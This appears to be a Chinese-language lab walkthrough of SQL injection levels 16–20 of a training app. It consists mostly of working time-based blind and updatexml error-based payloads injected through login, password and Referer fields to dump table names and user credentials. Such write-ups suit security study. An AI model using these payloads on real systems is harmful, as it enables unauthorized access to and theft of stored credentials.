第16关
一.判断闭合方式
闭合方式点“)
admin")and1=1#
二.判断数据库长度
admin") and if(length(database())>7, 0, sleep(5))#
页面无延迟
admin") and if(length(database())>8, 0, sleep(5))#
页面有延迟说明数据库长度为8
三.判断数据库的第一个字符
admin") and if(ascii(substr(database(),1,1))>114, 0, sleep(5))#
页面无延迟
admin") and if(ascii(substr(database(),1,1))>115, 0, sleep(5))#
页面有延迟说明数据库第一个字符为‘s’
........
最终得出数据库为security
四.判断数据库的表名
admin") and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>117, 0, sleep(5))#
说明数据库表名第一个字符为‘u’
.......
最终得出第一张表为users
五.判断表中的字段
admin") and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>105, 0, sleep(5))-- -
页面有延迟说明表中的第一个字段为‘e'
.......
以此类推可得出所有
第17关
一判断闭合点
发现只有用户名采用了过滤函数, 修改的密码并没有过滤;所以利用密码进行报错注入
1’ and 1=1;
二. 查询数据库
1'or updatexml(1,concat('~', database(), '~'),0) #
二.查询数据库下的所有表
1'or updatexml(1,concat('~', (select group_concat(table_name) from information_schema.tables where table_schema=database()), '~'),3) #
三.查询user表中的所有列
1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users'),'~'),1)#
四.查询所有数据
1' and updatexml(1,concat('~',(select group_concat(username,password) from users),'~'),1)#
第18关
利用urp Suite 抓包,在Referer后面进行注入测试
一.判断闭合点
闭合点为1'and
二.查询数据库
updatexml(1, concat(1, database ()), 1)and'
三.查表名
1'and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)and'
四.查列名
1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) and'
五.查看users表中所有信息
1' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)and'
第19关
与第18关同理
一.判断闭合点
闭合方式为'and'
二.查数据库
'and updatexml(1,concat(1,database()),1)and'
三.查表名
1'and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)and'
四.查列名
1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) and'
五.查看users表中所有信息
1' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)and'
第20关
一.判断闭合方式
闭合方式为'--+
二.查数据库
'and updatexml(1,concat(1,database()),1)--+
三.查表名
'and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+
四.查列名
' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+
五.查看users表中所有信息
' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)--+
